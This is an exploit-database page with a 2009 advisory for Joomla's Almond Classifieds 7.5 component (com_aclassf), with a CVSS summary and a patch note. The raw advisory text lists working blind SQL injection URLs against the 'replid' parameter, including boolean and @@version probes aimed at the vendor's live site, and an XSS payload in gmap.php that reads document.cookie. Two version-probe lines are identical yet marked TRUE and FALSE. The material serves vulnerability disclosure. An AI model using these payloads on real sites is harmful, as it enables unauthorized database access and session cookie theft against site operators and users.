header-logo
Suggest Exploit
vendor:
Almond Classifieds
by:
Moudi
8,8
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Almond Classifieds
Affected Version From: 7.5
Affected Version To: 7.5
Patch Exists: Yes
Related CWE: N/A
CPE: a:almondsoft:almond_classifieds:7.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla Component v.7.5 (com_aclassf) Multiple Remote Vulnerabilities

A Blind SQL Injection vulnerability exists in Joomla Component v.7.5 (com_aclassf) which allows an attacker to execute arbitrary SQL commands on the vulnerable system. This can be exploited to gain access to sensitive information such as passwords, usernames, etc. The vulnerability is due to insufficient sanitization of user-supplied input in the 'replid' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with malicious SQL commands to the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to apply the patch as soon as possible.
Source

Exploit-DB raw data:

###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
        [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
        [»] Joomla Component v.7.5 (com_aclassf) Multiple Remote Vulnerabilities
==============================================================================

	[»] Script:             [ Joomla Almond Classifieds v.7.5 ]
	[»] Language:           [ PHP ]
        [»] Download:           [ http://www.almondsoft.com  ]
	[»] Founder:            [ Moudi <m0udi@9.cn> ]
        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
        [»] Team:               [ EvilWay ]
        [»] Dork:               [ OFF ]
        [»] Price:              [ $195 ]
        [»] Site :              [ https://security-shell.ws/forum.php ]

###########################################################################

===[ Exploit + LIVE : BLIND SQL INJECTION vulnerability ]===	
	
[»] http://www.site.com/patch/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=[BLIND]

[»] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438   and 1=1 <= TRUE
[»] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438   and 1=2 <= FALSE

[»] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5
    => TRUE
[»] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5
    => FALSE

===[ Exploit XSS + LIVE : vulnerability ]===

[»] http://www.site.com/patch/components/com_aclassf/gmap.php?addr=[XSS]

[»] http://www.almondsoft.com/j/components/com_aclassf/gmap.php?addr="><script>alert(document.cookie);</script>

Author: Moudi

###########################################################################

# milw0rm.com [2009-07-27]

Navigation

Suggest Exploit

Services By CQR